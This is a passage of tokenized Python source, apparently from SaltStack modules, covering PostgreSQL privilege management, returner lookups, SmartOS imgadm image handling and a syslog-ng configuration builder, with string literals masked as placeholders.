upper ( ) ) <EOL> return object_type , privileges , _privs <EOL> def _process_priv_part ( perms ) : <EOL> '''<STR_LIT>''' <EOL> _tmp = { } <EOL> previous = None <EOL> for perm in perms : <EOL> if previous is None : <EOL> _tmp [ _PRIVILEGES_MAP [ perm ] ] = False <EOL> previous = _PRIVILEGES_MAP [ perm ] <EOL> else : <EOL> if perm == '<STR_LIT:*>' : <EOL> _tmp [ previous ] = True <EOL> else : <EOL> _tmp [ _PRIVILEGES_MAP [ perm ] ] = False <EOL> previous = _PRIVILEGES_MAP [ perm ] <EOL> return _tmp <EOL> def privileges_list ( <EOL> name , <EOL> object_type , <EOL> prepend = '<STR_LIT>' , <EOL> maintenance_db = None , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> object_type = object_type . lower ( ) <EOL> query = _make_privileges_list_query ( name , object_type , prepend ) <EOL> if object_type not in _PRIVILEGES_OBJECTS : <EOL> raise SaltInvocationError ( <EOL> '<STR_LIT>' . format ( object_type ) ) <EOL> rows = psql_query ( <EOL> query , <EOL> runas = runas , <EOL> host = host , <EOL> user = user , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password ) <EOL> ret = { } <EOL> for row in rows : <EOL> if object_type != '<STR_LIT>' : <EOL> result = row [ '<STR_LIT:name>' ] <EOL> result = result . strip ( '<STR_LIT:{}>' ) <EOL> parts = result . split ( '<STR_LIT:U+002C>' ) <EOL> for part in parts : <EOL> perms_part , _ = part . split ( '<STR_LIT:/>' ) <EOL> rolename , perms = perms_part . 
split ( '<STR_LIT:=>' ) <EOL> if rolename == '<STR_LIT>' : <EOL> rolename = '<STR_LIT>' <EOL> _tmp = _process_priv_part ( perms ) <EOL> ret [ rolename ] = _tmp <EOL> else : <EOL> if row [ '<STR_LIT>' ] == '<STR_LIT:t>' : <EOL> admin_option = True <EOL> else : <EOL> admin_option = False <EOL> ret [ row [ '<STR_LIT>' ] ] = admin_option <EOL> return ret <EOL> def has_privileges ( name , <EOL> object_name , <EOL> object_type , <EOL> privileges = None , <EOL> grant_option = None , <EOL> prepend = '<STR_LIT>' , <EOL> maintenance_db = None , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> object_type , privileges , _privs = _mod_priv_opts ( object_type , privileges ) <EOL> _validate_privileges ( object_type , _privs , privileges ) <EOL> if object_type != '<STR_LIT>' : <EOL> owner = _get_object_owner ( object_name , object_type , prepend = prepend , <EOL> maintenance_db = maintenance_db , user = user , host = host , port = port , <EOL> password = password , runas = runas ) <EOL> if owner is not None and name == owner : <EOL> return True <EOL> _privileges = privileges_list ( object_name , object_type , prepend = prepend , <EOL> maintenance_db = maintenance_db , user = user , host = host , port = port , <EOL> password = password , runas = runas ) <EOL> if name in _privileges : <EOL> if object_type == '<STR_LIT>' : <EOL> if grant_option : <EOL> retval = _privileges [ name ] <EOL> else : <EOL> retval = True <EOL> return retval <EOL> else : <EOL> _perms = _PRIVILEGE_TYPE_MAP [ object_type ] <EOL> if grant_option : <EOL> perms = dict ( ( _PRIVILEGES_MAP [ perm ] , True ) for perm in _perms ) <EOL> retval = perms == _privileges [ name ] <EOL> else : <EOL> perms = [ _PRIVILEGES_MAP [ perm ] for perm in _perms ] <EOL> if '<STR_LIT>' in _privs : <EOL> retval = perms . sort ( ) == _privileges [ name ] . keys ( ) . sort ( ) <EOL> else : <EOL> retval = set ( _privs ) . 
issubset ( <EOL> set ( _privileges [ name ] . keys ( ) ) ) <EOL> return retval <EOL> return False <EOL> def privileges_grant ( name , <EOL> object_name , <EOL> object_type , <EOL> privileges = None , <EOL> grant_option = None , <EOL> prepend = '<STR_LIT>' , <EOL> maintenance_db = None , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> object_type , privileges , _privs = _mod_priv_opts ( object_type , privileges ) <EOL> _validate_privileges ( object_type , _privs , privileges ) <EOL> if has_privileges ( name , object_name , object_type , privileges , <EOL> prepend = prepend , maintenance_db = maintenance_db , user = user , <EOL> host = host , port = port , password = password , runas = runas ) : <EOL> log . info ( '<STR_LIT>' , <EOL> object_name , object_type , privileges ) <EOL> return False <EOL> _grants = '<STR_LIT:U+002C>' . join ( _privs ) <EOL> if object_type in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> on_part = '<STR_LIT>' . format ( prepend , object_name ) <EOL> else : <EOL> on_part = object_name <EOL> if grant_option : <EOL> if object_type == '<STR_LIT>' : <EOL> query = '<STR_LIT>' . format ( <EOL> object_name , name ) <EOL> else : <EOL> query = '<STR_LIT>' . format ( <EOL> _grants , object_type . upper ( ) , on_part , name ) <EOL> else : <EOL> if object_type == '<STR_LIT>' : <EOL> query = '<STR_LIT>' . format ( object_name , name ) <EOL> else : <EOL> query = '<STR_LIT>' . format ( <EOL> _grants , object_type . 
upper ( ) , on_part , name ) <EOL> ret = _psql_prepare_and_run ( [ '<STR_LIT:-c>' , query ] , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) <EOL> return ret [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> def privileges_revoke ( name , <EOL> object_name , <EOL> object_type , <EOL> privileges = None , <EOL> prepend = '<STR_LIT>' , <EOL> maintenance_db = None , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> object_type , privileges , _privs = _mod_priv_opts ( object_type , privileges ) <EOL> _validate_privileges ( object_type , _privs , privileges ) <EOL> if not has_privileges ( name , object_name , object_type , privileges , <EOL> prepend = prepend , maintenance_db = maintenance_db , user = user , <EOL> host = host , port = port , password = password , runas = runas ) : <EOL> log . info ( '<STR_LIT>' <EOL> '<STR_LIT>' , object_name , object_type , privileges ) <EOL> return False <EOL> _grants = '<STR_LIT:U+002C>' . join ( _privs ) <EOL> if object_type in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> on_part = '<STR_LIT>' . format ( prepend , object_name ) <EOL> else : <EOL> on_part = object_name <EOL> if object_type == '<STR_LIT>' : <EOL> query = '<STR_LIT>' . format ( object_name , name ) <EOL> else : <EOL> query = '<STR_LIT>' . format ( <EOL> _grants , object_type . upper ( ) , on_part , name ) <EOL> ret = _psql_prepare_and_run ( [ '<STR_LIT:-c>' , query ] , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) <EOL> return ret [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> def datadir_init ( name , <EOL> auth = '<STR_LIT:password>' , <EOL> user = None , <EOL> password = None , <EOL> encoding = '<STR_LIT>' , <EOL> locale = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> if salt . utils . 
which ( '<STR_LIT>' ) is None : <EOL> log . error ( '<STR_LIT>' ) <EOL> return False <EOL> if datadir_exists ( name ) : <EOL> log . info ( '<STR_LIT>' , name ) <EOL> return False <EOL> ret = _run_initdb ( <EOL> name , <EOL> auth = auth , <EOL> user = user , <EOL> password = password , <EOL> encoding = encoding , <EOL> locale = locale , <EOL> runas = runas ) <EOL> return ret [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> def datadir_exists ( name ) : <EOL> '''<STR_LIT>''' <EOL> _version_file = os . path . join ( name , '<STR_LIT>' ) <EOL> _config_file = os . path . join ( name , '<STR_LIT>' ) <EOL> return os . path . isfile ( _version_file ) and os . path . isfile ( _config_file ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import salt . loader <EOL> def get_jid ( returner , jid ) : <EOL> '''<STR_LIT>''' <EOL> returners = salt . loader . returners ( __opts__ , __salt__ ) <EOL> return returners [ '<STR_LIT>' . format ( returner ) ] ( jid ) <EOL> def get_fun ( returner , fun ) : <EOL> '''<STR_LIT>''' <EOL> returners = salt . loader . returners ( __opts__ , __salt__ ) <EOL> return returners [ '<STR_LIT>' . format ( returner ) ] ( fun ) <EOL> def get_jids ( returner ) : <EOL> '''<STR_LIT>''' <EOL> returners = salt . loader . returners ( __opts__ , __salt__ ) <EOL> return returners [ '<STR_LIT>' . format ( returner ) ] ( ) <EOL> def get_minions ( returner ) : <EOL> '''<STR_LIT>''' <EOL> returners = salt . loader . returners ( __opts__ , __salt__ ) <EOL> return returners [ '<STR_LIT>' . format ( returner ) ] ( ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import logging <EOL> import json <EOL> import salt . utils <EOL> import salt . utils . decorators as decorators <EOL> log = logging . getLogger ( __name__ ) <EOL> __func_alias__ = { <EOL> '<STR_LIT>' : '<STR_LIT:list>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> __virtualname__ = '<STR_LIT>' <EOL> @ decorators . memoize <EOL> def _check_imgadm ( ) : <EOL> '''<STR_LIT>''' <EOL> return salt . utils . which ( '<STR_LIT>' ) <EOL> def _exit_status ( retcode ) : <EOL> '''<STR_LIT>''' <EOL> ret = { <NUM_LIT:0> : '<STR_LIT>' , <EOL> <NUM_LIT:1> : '<STR_LIT>' , <EOL> <NUM_LIT:2> : '<STR_LIT>' , <EOL> <NUM_LIT:3> : '<STR_LIT>' } [ retcode ] <EOL> return ret <EOL> def _parse_image_meta ( image = None , detail = False ) : <EOL> if not image : <EOL> return { } <EOL> if detail : <EOL> return { <EOL> '<STR_LIT:name>' : image [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT:version>' : image [ '<STR_LIT>' ] [ '<STR_LIT:version>' ] , <EOL> '<STR_LIT>' : image [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> '<STR_LIT:description>' : image [ '<STR_LIT>' ] [ '<STR_LIT:description>' ] , <EOL> '<STR_LIT>' : image [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> '<STR_LIT:source>' : image [ '<STR_LIT:source>' ] <EOL> } <EOL> else : <EOL> return '<STR_LIT>' . format ( <EOL> name = image [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] , <EOL> version = image [ '<STR_LIT>' ] [ '<STR_LIT:version>' ] , <EOL> date = image [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> ) <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> if salt . utils . is_smartos_globalzone ( ) and _check_imgadm ( ) : <EOL> return __virtualname__ <EOL> return ( <EOL> False , <EOL> '<STR_LIT>' . format ( <EOL> __virtualname__ <EOL> ) <EOL> ) <EOL> def version ( ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> imgadm = _check_imgadm ( ) <EOL> cmd = '<STR_LIT>' . format ( imgadm ) <EOL> res = __salt__ [ '<STR_LIT>' ] ( cmd ) . 
splitlines ( ) <EOL> ret = res [ <NUM_LIT:0> ] . split ( ) <EOL> return ret [ - <NUM_LIT:1> ] <EOL> def update_installed ( uuid = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> imgadm = _check_imgadm ( ) <EOL> if imgadm : <EOL> cmd = '<STR_LIT>' . format ( imgadm , uuid ) . rstrip ( ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd ) <EOL> return { } <EOL> def avail ( search = None , verbose = False ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> imgadm = _check_imgadm ( ) <EOL> cmd = '<STR_LIT>' . format ( imgadm ) <EOL> res = __salt__ [ '<STR_LIT>' ] ( cmd ) <EOL> retcode = res [ '<STR_LIT>' ] <EOL> result = { } <EOL> if retcode != <NUM_LIT:0> : <EOL> ret [ '<STR_LIT>' ] = _exit_status ( retcode ) <EOL> return ret <EOL> for image in json . loads ( res [ '<STR_LIT>' ] ) : <EOL> if image [ '<STR_LIT>' ] [ '<STR_LIT>' ] or not image [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> continue <EOL> if search and search not in image [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] : <EOL> continue <EOL> result [ image [ '<STR_LIT>' ] [ '<STR_LIT>' ] ] = _parse_image_meta ( image , verbose ) <EOL> return result <EOL> def list_installed ( verbose = False ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> imgadm = _check_imgadm ( ) <EOL> cmd = '<STR_LIT>' . format ( imgadm ) <EOL> res = __salt__ [ '<STR_LIT>' ] ( cmd ) <EOL> retcode = res [ '<STR_LIT>' ] <EOL> result = { } <EOL> if retcode != <NUM_LIT:0> : <EOL> ret [ '<STR_LIT>' ] = _exit_status ( retcode ) <EOL> return ret <EOL> for image in json . loads ( res [ '<STR_LIT>' ] ) : <EOL> result [ image [ '<STR_LIT>' ] [ '<STR_LIT>' ] ] = _parse_image_meta ( image , verbose ) <EOL> return result <EOL> def show ( uuid ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> imgadm = _check_imgadm ( ) <EOL> cmd = '<STR_LIT>' . 
format ( imgadm , uuid ) <EOL> res = __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) <EOL> retcode = res [ '<STR_LIT>' ] <EOL> if retcode != <NUM_LIT:0> : <EOL> ret [ '<STR_LIT>' ] = _exit_status ( retcode ) <EOL> return ret <EOL> ret = json . loads ( res [ '<STR_LIT>' ] ) <EOL> return ret <EOL> def get ( uuid ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> imgadm = _check_imgadm ( ) <EOL> cmd = '<STR_LIT>' . format ( imgadm , uuid ) <EOL> res = __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) <EOL> retcode = res [ '<STR_LIT>' ] <EOL> if retcode != <NUM_LIT:0> : <EOL> ret [ '<STR_LIT>' ] = _exit_status ( retcode ) <EOL> return ret <EOL> ret = json . loads ( res [ '<STR_LIT>' ] ) <EOL> return ret <EOL> def import_image ( uuid , verbose = False ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> imgadm = _check_imgadm ( ) <EOL> cmd = '<STR_LIT>' . format ( imgadm , uuid ) <EOL> res = __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) <EOL> retcode = res [ '<STR_LIT>' ] <EOL> if retcode != <NUM_LIT:0> : <EOL> ret [ '<STR_LIT>' ] = _exit_status ( retcode ) <EOL> return ret <EOL> return { uuid : _parse_image_meta ( get ( uuid ) , verbose ) } <EOL> def delete ( uuid ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> imgadm = _check_imgadm ( ) <EOL> cmd = '<STR_LIT>' . format ( imgadm , uuid ) <EOL> res = __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) <EOL> retcode = res [ '<STR_LIT>' ] <EOL> if retcode != <NUM_LIT:0> : <EOL> ret [ '<STR_LIT>' ] = _exit_status ( retcode ) <EOL> return ret <EOL> result = [ ] <EOL> for image in res [ '<STR_LIT>' ] . splitlines ( ) : <EOL> image = [ var for var in image . split ( "<STR_LIT:U+0020>" ) if var ] <EOL> result . append ( image [ <NUM_LIT:2> ] ) <EOL> return result <EOL> def vacuum ( verbose = False ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> imgadm = _check_imgadm ( ) <EOL> cmd = '<STR_LIT>' . 
format ( imgadm ) <EOL> res = __salt__ [ '<STR_LIT>' ] ( cmd ) <EOL> retcode = res [ '<STR_LIT>' ] <EOL> if retcode != <NUM_LIT:0> : <EOL> ret [ '<STR_LIT>' ] = _exit_status ( retcode ) <EOL> return ret <EOL> result = { } <EOL> for image in res [ '<STR_LIT>' ] . splitlines ( ) : <EOL> image = [ var for var in image . split ( "<STR_LIT:U+0020>" ) if var ] <EOL> result [ image [ <NUM_LIT:2> ] ] = { <EOL> '<STR_LIT:name>' : image [ <NUM_LIT:3> ] [ <NUM_LIT:1> : image [ <NUM_LIT:3> ] . index ( '<STR_LIT:@>' ) ] , <EOL> '<STR_LIT:version>' : image [ <NUM_LIT:3> ] [ image [ <NUM_LIT:3> ] . index ( '<STR_LIT:@>' ) + <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> } <EOL> if verbose : <EOL> return result <EOL> else : <EOL> return list ( result . keys ( ) ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import , generators , with_statement <EOL> import time <EOL> import logging <EOL> import salt <EOL> import os <EOL> import os . path <EOL> import salt . utils <EOL> from salt . exceptions import CommandExecutionError <EOL> import salt . ext . six as six <EOL> from salt . ext . six . moves import range <EOL> __SYSLOG_NG_BINARY_PATH = None <EOL> __SYSLOG_NG_CONFIG_FILE = '<STR_LIT>' <EOL> __SALT_GENERATED_CONFIG_HEADER = '''<STR_LIT>''' <EOL> class SyslogNgError ( Exception ) : <EOL> pass <EOL> log = logging . getLogger ( __name__ ) <EOL> log . setLevel ( logging . DEBUG ) <EOL> __func_alias__ = { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> _INDENT = '<STR_LIT>' <EOL> _INDENT_STEP = '<STR_LIT:U+0020>' <EOL> _current_statement = None <EOL> _current_option = None <EOL> _current_parameter = None <EOL> _current_parameter_value = None <EOL> def _increase_indent ( ) : <EOL> '''<STR_LIT>''' <EOL> global _INDENT <EOL> _INDENT += _INDENT_STEP <EOL> def _decrease_indent ( ) : <EOL> '''<STR_LIT>''' <EOL> global _INDENT <EOL> _INDENT = _INDENT [ <NUM_LIT:4> : ] <EOL> def _indent ( value ) : <EOL> '''<STR_LIT>''' <EOL> return '<STR_LIT>' . format ( _INDENT , value ) <EOL> def _indentln ( string ) : <EOL> '''<STR_LIT>''' <EOL> return _indent ( string + '<STR_LIT:\n>' ) <EOL> class Buildable ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , iterable , join_body_on = '<STR_LIT>' , append_extra_newline = True ) : <EOL> self . iterable = iterable <EOL> self . join_body_on = join_body_on <EOL> self . append_extra_newline = append_extra_newline <EOL> def build_header ( self ) : <EOL> '''<STR_LIT>''' <EOL> return '<STR_LIT>' <EOL> def build_tail ( self ) : <EOL> '''<STR_LIT>''' <EOL> return '<STR_LIT>' <EOL> def build_body ( self ) : <EOL> '''<STR_LIT>''' <EOL> _increase_indent ( ) <EOL> body_array = [ x . build ( ) for x in self . iterable ] <EOL> nl = '<STR_LIT:\n>' if self . 
append_extra_newline else '<STR_LIT>' <EOL> if len ( self . iterable ) >= <NUM_LIT:1> : <EOL> body = self . join_body_on . join ( body_array ) + nl <EOL> else : <EOL> body = '<STR_LIT>' <EOL> _decrease_indent ( ) <EOL> return body <EOL> def build ( self ) : <EOL> '''<STR_LIT>''' <EOL> header = self . build_header ( ) <EOL> body = self . build_body ( ) <EOL> tail = self . build_tail ( ) <EOL> return header + body + tail <EOL> class Statement ( Buildable ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , type , id = '<STR_LIT>' , options = None , has_name = True ) : <EOL> super ( Statement , self ) . __init__ ( options , <EOL> join_body_on = '<STR_LIT>' , <EOL> append_extra_newline = False ) <EOL> self . type = type <EOL> self . id = id <EOL> self . options = options if options else [ ] <EOL> self . iterable = self . options <EOL> self . has_name = has_name <EOL> def build_header ( self ) : <EOL> if self . has_name : <EOL> return _indentln ( '<STR_LIT>' . format ( self . type , self . id ) ) <EOL> else : <EOL> return _indentln ( '<STR_LIT>' . format ( self . type ) ) <EOL> def build_tail ( self ) : <EOL> return _indentln ( '<STR_LIT>' ) <EOL> def add_child ( self , option ) : <EOL> self . options . append ( option ) <EOL> class NamedStatement ( Statement ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , type , id = '<STR_LIT>' , options = None ) : <EOL> super ( NamedStatement , self ) . __init__ ( type , id , options , has_name = True ) <EOL> class UnnamedStatement ( Statement ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , type , options = None ) : <EOL> super ( UnnamedStatement , self ) . __init__ ( type , <EOL> id = '<STR_LIT>' , <EOL> options = options , <EOL> has_name = False ) <EOL> class GivenStatement ( Buildable ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , value , add_newline = True ) : <EOL> super ( GivenStatement , self ) . __init__ ( iterable = None ) <EOL> self . value = value <EOL> self . 
add_newline = add_newline <EOL> def build ( self ) : <EOL> if self . add_newline : <EOL> return self . value + '<STR_LIT:\n>' <EOL> else : <EOL> return self . value <EOL> class Option ( Buildable ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , type = '<STR_LIT>' , params = None ) : <EOL> super ( Option , self ) . __init__ ( params , '<STR_LIT>' ) <EOL> self . type = type <EOL> self . params = params if params else [ ] <EOL> self . iterable = self . params <EOL> def build ( self ) : <EOL> header = _indentln ( '<STR_LIT>' . format ( self . type ) ) <EOL> tail = _indentln ( '<STR_LIT>' ) <EOL> body = self . build_body ( ) <EOL> return header + body + tail <EOL> def add_parameter ( self , param ) : <EOL> self . params . append ( param ) <EOL> class Parameter ( Buildable ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , iterable = None , join_body_on = '<STR_LIT>' ) : <EOL> super ( Parameter , self ) . __init__ ( iterable , join_body_on ) <EOL> class SimpleParameter ( Parameter ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , value = '<STR_LIT>' ) : <EOL> super ( SimpleParameter , self ) . __init__ ( ) <EOL> self . value = value <EOL> def build ( self ) : <EOL> return _indent ( self . value ) <EOL> class TypedParameter ( Parameter ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , type = '<STR_LIT>' , values = None ) : <EOL> super ( TypedParameter , self ) . __init__ ( values , '<STR_LIT>' ) <EOL> self . type = type <EOL> self . values = values if values else [ ] <EOL> self . iterable = self . values <EOL> def build ( self ) : <EOL> header = _indentln ( '<STR_LIT>' . format ( self . type ) ) <EOL> tail = _indent ( '<STR_LIT:)>' ) <EOL> body = self . build_body ( ) <EOL> return header + body + tail <EOL> def add_value ( self , value ) : <EOL> self . values . append ( value ) <EOL> class ParameterValue ( Buildable ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , iterable = None , join_body_on = '<STR_LIT>' ) : <EOL> super ( ParameterValue , self ) . 
__init__ ( iterable , join_body_on ) <EOL> class SimpleParameterValue ( ParameterValue ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , value = '<STR_LIT>' ) : <EOL> super ( SimpleParameterValue , self ) . __init__ ( ) <EOL> self . value = value <EOL> def build ( self ) : <EOL> return _indent ( self . value ) <EOL> class TypedParameterValue ( ParameterValue ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , type = '<STR_LIT>' , arguments = None ) : <EOL> super ( TypedParameterValue , self ) . __init__ ( arguments , '<STR_LIT:\n>' ) <EOL> self . type = type <EOL> self . arguments = arguments if arguments else [ ] <EOL> self . iterable = self . arguments <EOL> def build ( self ) : <EOL> header = _indentln ( '<STR_LIT>' . format ( self . type ) ) <EOL> tail = _indent ( '<STR_LIT:)>' ) <EOL> body = self . build_body ( ) <EOL> return header + body + tail <EOL> def add_argument ( self , arg ) : <EOL> self . arguments . append ( arg ) <EOL> class Argument ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , value = '<STR_LIT>' ) : <EOL> self . value = value <EOL> def build ( self ) : <EOL> return _indent ( self . value ) <EOL> def _is_statement_unnamed ( statement ) : <EOL> '''<STR_LIT>''' <EOL> return statement in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def _is_simple_type ( value ) : <EOL> '''<STR_LIT>''' <EOL> return isinstance ( value , str ) or isinstance ( value , int ) or isinstance ( value , float ) or isinstance ( value , bool ) <EOL> def _get_type_id_options ( name , configuration ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT:.>' in name : <EOL> type_ , sep , id_ = name . partition ( '<STR_LIT:.>' ) <EOL> options = configuration <EOL> else : <EOL> type_ = next ( six . iterkeys ( configuration ) ) <EOL> id_ = name <EOL> options = configuration [ type_ ] <EOL> return type_ , id_ , options <EOL> def _expand_one_key_dictionary ( _dict ) : <EOL> '''<STR_LIT>''' <EOL> key = next ( six . 
iterkeys ( _dict ) ) <EOL> value = _dict [ key ] <EOL> return key , value <EOL> def _parse_typed_parameter_typed_value ( values ) : <EOL> '''<STR_LIT>''' <EOL> type_ , value = _expand_one_key_dictionary ( values ) <EOL> _current_parameter_value . type = type_ <EOL> if _is_simple_type ( value ) : <EOL> arg = Argument ( value ) <EOL> _current_parameter_value . add_argument ( arg ) <EOL> elif isinstance ( value , list ) : <EOL> for idx in value : <EOL> arg = Argument ( idx ) <EOL> _current_parameter_value . add_argument ( arg ) <EOL> def _parse_typed_parameter ( param ) : <EOL> '''<STR_LIT>''' <EOL> global _current_parameter_value <EOL> type_ , value = _expand_one_key_dictionary ( param ) <EOL> _current_parameter . type = type_ <EOL> if _is_simple_type ( value ) and value != '<STR_LIT>' : <EOL> _current_parameter_value = SimpleParameterValue ( value ) <EOL> _current_parameter . add_value ( _current_parameter_value ) <EOL> elif isinstance ( value , list ) : <EOL> for i in value : <EOL> if _is_simple_type ( i ) : <EOL> _current_parameter_value = SimpleParameterValue ( i ) <EOL> _current_parameter . add_value ( _current_parameter_value ) <EOL> elif isinstance ( i , dict ) : <EOL> _current_parameter_value = TypedParameterValue ( ) <EOL> _parse_typed_parameter_typed_value ( i ) <EOL> _current_parameter . add_value ( _current_parameter_value ) <EOL> def _create_and_add_parameters ( params ) : <EOL> '''<STR_LIT>''' <EOL> global _current_parameter <EOL> if _is_simple_type ( params ) : <EOL> _current_parameter = SimpleParameter ( params ) <EOL> _current_option . add_parameter ( _current_parameter ) <EOL> else : <EOL> for i in params : <EOL> if _is_simple_type ( i ) : <EOL> _current_parameter = SimpleParameter ( i ) <EOL> else : <EOL> _current_parameter = TypedParameter ( ) <EOL> _parse_typed_parameter ( i ) <EOL> _current_option . 
add_parameter ( _current_parameter ) <EOL> def _create_and_add_option ( option ) : <EOL> '''<STR_LIT>''' <EOL> global _current_option <EOL> _current_option = Option ( ) <EOL> type_ , params = _expand_one_key_dictionary ( option ) <EOL> _current_option . type = type_ <EOL> _create_and_add_parameters ( params ) <EOL> _current_statement . add_child ( _current_option ) <EOL> def _parse_statement ( options ) : <EOL> '''<STR_LIT>''' <EOL> for option in options : <EOL> _create_and_add_option ( option ) <EOL> def _is_reference ( arg ) : <EOL> '''<STR_LIT>''' <EOL> return isinstance ( arg , dict ) and len ( arg ) == <NUM_LIT:1> and isinstance ( next ( six . itervalues ( arg ) ) , six . string_types ) <EOL> def _is_junction ( arg ) : <EOL> '''<STR_LIT>''' <EOL> return isinstance ( arg , dict ) and len ( arg ) == <NUM_LIT:1> and next ( six . iterkeys ( arg ) ) == '<STR_LIT>' <EOL> def _add_reference ( reference , statement ) : <EOL> '''<STR_LIT>''' <EOL> type_ , value = _expand_one_key_dictionary ( reference ) <EOL> opt = Option ( type_ ) <EOL> param = SimpleParameter ( value ) <EOL> opt . add_parameter ( param ) <EOL> statement . add_child ( opt ) <EOL> def _is_inline_definition ( arg ) : <EOL> '''<STR_LIT>''' <EOL> return isinstance ( arg , dict ) and len ( arg ) == <NUM_LIT:1> and isinstance ( next ( six . itervalues ( arg ) ) , list ) <EOL> def _add_inline_definition ( item , statement ) : <EOL> '''<STR_LIT>''' <EOL> global _current_statement <EOL> backup = _current_statement <EOL> type_ , options = _expand_one_key_dictionary ( item ) <EOL> _current_statement = UnnamedStatement ( type = type_ ) <EOL> _parse_statement ( options ) <EOL> statement . 
add_child ( _current_statement ) <EOL> _current_statement = backup <EOL> def _add_junction ( item ) : <EOL> '''<STR_LIT>''' <EOL> type_ , channels = _expand_one_key_dictionary ( item ) <EOL> junction = UnnamedStatement ( type = '<STR_LIT>' ) <EOL> for item in channels : <EOL> type_ , value = _expand_one_key_dictionary ( item ) <EOL> channel = UnnamedStatement ( type = '<STR_LIT>' ) <EOL> for val in value : <EOL> if _is_reference ( val ) : <EOL> _add_reference ( val , channel ) <EOL> elif _is_inline_definition ( val ) : <EOL> _add_inline_definition ( val , channel ) <EOL> junction . add_child ( channel ) <EOL> _current_statement . add_child ( junction ) <EOL> def _parse_log_statement ( options ) : <EOL> '''<STR_LIT>''' <EOL> for i in options : <EOL> if _is_reference ( i ) : <EOL> _add_reference ( i , _current_statement ) <EOL> elif _is_junction ( i ) : <EOL> _add_junction ( i ) <EOL> elif _is_inline_definition ( i ) : <EOL> _add_inline_definition ( i , _current_statement ) <EOL> def _build_config_tree ( name , configuration ) : <EOL> '''<STR_LIT>''' <EOL> type_ , id_ , options = _get_type_id_options ( name , configuration ) <EOL> global _INDENT , _current_statement <EOL> _INDENT = '<STR_LIT>' <EOL> if type_ == '<STR_LIT>' : <EOL> _current_statement = GivenStatement ( options ) <EOL> elif type_ == '<STR_LIT>' : <EOL> _current_statement = UnnamedStatement ( type = '<STR_LIT>' ) <EOL> _parse_log_statement ( options ) <EOL> else : <EOL> if _is_statement_unnamed ( type_ ) : <EOL> _current_statement = UnnamedStatement ( type = type_ ) <EOL> else : <EOL> _current_statement = NamedStatement ( type = type_ , id = id_ ) <EOL> _parse_statement ( options ) <EOL> def _render_configuration ( ) : <EOL> '''<STR_LIT>''' <EOL> text_repr = _current_statement . 
